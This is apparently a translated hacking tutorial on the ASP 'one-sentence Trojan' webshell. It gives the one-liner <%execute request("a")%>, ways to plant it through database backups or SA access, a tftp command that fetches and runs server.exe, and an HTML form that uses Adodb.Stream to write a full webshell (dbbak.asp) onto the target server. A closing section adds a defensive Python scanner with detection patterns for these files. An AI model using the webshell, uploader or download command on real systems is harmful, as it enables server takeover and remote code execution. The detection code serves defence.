The one-sentence Trojan is inserted into an ASP file (the one-sentence Trojan can, of course, itself be the ASP file). The file must be reachable from IE: only if it can be accessed can we submit data to it, and as long as it can be accessed, it can be reached over HTTP.
Scope of use of the one-sentence Trojan (I list only two cases):
1) Only database backup is required
When the database is backed up as an .asp file, this works as long as no compilation error (missing script close tag %>) occurs.
2) With SA permissions, a one-sentence Trojan is usually written first for convenience. (Of course, it is faster to upload the pigeon directly via tftp and run it.)
tftp -i ip get server.exe
How the one-sentence Trojan <%execute request("a")%> works:
First, note that the execute() function executes ASP code: it runs the horse we uploaded by passing it to asp.dll for parsing. The code <%execute request("a")%> above can be read as:
<%
if request("a")<>"" then execute request("a")
%>
That is, if a is not empty (if a != 0), it is executed. What gets executed?...
Let's take a look at the client:
<form action=http://192.168.0.28/shell.asp method=post>
<textarea name=l cols=120 rows=10 width=45>
set lP=server.CreateObject("Adodb.Stream") 'Create the Adodb.Stream component
lP.Open
lP.Type=2
lP.CharSet="gb2312"
lP.writetext request("p")
lP.SaveToFile server.mappath("dbbak.asp"),2
lP.Close
set lP=nothing
response.redirect "dbbak.asp"
</textarea>
<textarea name=p cols=120 rows=10 width=45>Data to be submitted</textarea><BR><center><br>
<input type=submit value=submit>
Adodb.Stream is responsible for writing the submitted data to the server:
Component: Adodb.Stream
It has the following methods:
Cancel method
How to use it:
Object.Cancel
Description: Cancels execution of a pending asynchronous Execute or Open method call.
WriteText method
How to use it:
Object.WriteText(Data,[Options])
Description: Loads the specified text data into the object.
Parameter description: Data is the content to be written.
Options: the write options, which can be left unspecified. The optional values are as follows:
adWriteChar =0
adWriteLine =1
SaveToFile method
How to use it:
Object.SaveToFile(FileName,[Options])
Description: Writes the contents of the object to the file specified by FileName.
That is, the file name where we save the Trojan is dbbak.asp
Parameter description: FileName is the file to write to.
Options: the save options, which can be left unspecified. The optional values are as follows:
adSaveCreateNotExist =1
adSaveCreateOverWrite =2
Once the one-sentence Trojan is in place, the value of a is empty and it waits for a value to be submitted. Accessing http://www.***.com/**.asp is this waiting state: the execute() function stands ready to execute whatever arrives...
The submitted code creates an Adodb.Stream object, which is responsible for writing our data to the server...
At the same time, the component's SaveToFile method sets the file name of our big horse (the full Trojan): dbbak.asp
After the form is submitted to the server, the execute() function detects that the value of a is not empty, so it executes our big horse!
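
From the defender's side, both pieces described above leave recognisable text in files under the web root: the execute-on-request one-liner (including when it sits inside binary database-backup data saved with an .asp name) and an Adodb.Stream script that writes request text to a file. The following scanner is an added example, not code from the original article; the sample file contents, the finding labels and the function names are constructed for illustration, and the patterns are heuristics rather than a complete signature set.

```python
import re

# Constructed sample files (name -> raw bytes); none of this is from the page.
SAMPLES = {
    "shell.asp": b'<%execute request("a")%>',
    # One-liner buried in binary database-backup data saved with an .asp name.
    "bak.asp": b'\x00\x01Standard Jet DB\x00<%  EXECUTE(Request.Form("a"))%>\x00\x9f',
    # Adodb.Stream writer that saves posted text to a file under the web root.
    "up.asp": b'<% Set s = Server.CreateObject("ADODB.Stream")\r\n'
              b's.Open : s.WriteText Request("p")\r\n'
              b's.SaveToFile Server.MapPath("x.asp"), 2 %>',
    "index.asp": b'<% Response.Write Server.HTMLEncode(Request("q")) %>',
}

# execute / executeglobal / eval applied directly to request data after "<%".
# Bytes patterns are used because backup files are binary; case and spacing vary.
ONE_LINER = re.compile(
    rb"<%[^%]{0,200}?\b(?:execute(?:global)?|eval)\s*\(?\s*request\b", re.I)
STREAM = re.compile(rb"adodb\.stream", re.I)
WRITE_REQ = re.compile(rb"\.\s*writetext\s*\(?\s*request\b", re.I)
SAVE = re.compile(rb"\.\s*savetofile\b", re.I)

def classify(data: bytes) -> list:
    """Return the heuristic findings for one file's contents."""
    findings = []
    if ONE_LINER.search(data):
        findings.append("execute-on-request")
    # Heuristic: request text written through Adodb.Stream and saved to disk.
    if STREAM.search(data) and WRITE_REQ.search(data) and SAVE.search(data):
        findings.append("request-to-file-writer")
    return findings

def scan(files: dict) -> dict:
    """Map each flagged file name to its findings; clean files are omitted."""
    results = {name: classify(data) for name, data in files.items()}
    return {name: hits for name, hits in results.items() if hits}

if __name__ == "__main__":
    for name, hits in scan(SAMPLES).items():
        print(name, hits)
```

To use it on a real site, read each file under the web root in binary mode and pass the bytes to `classify`; review hits by hand, since legitimate upload code can also use Adodb.Stream.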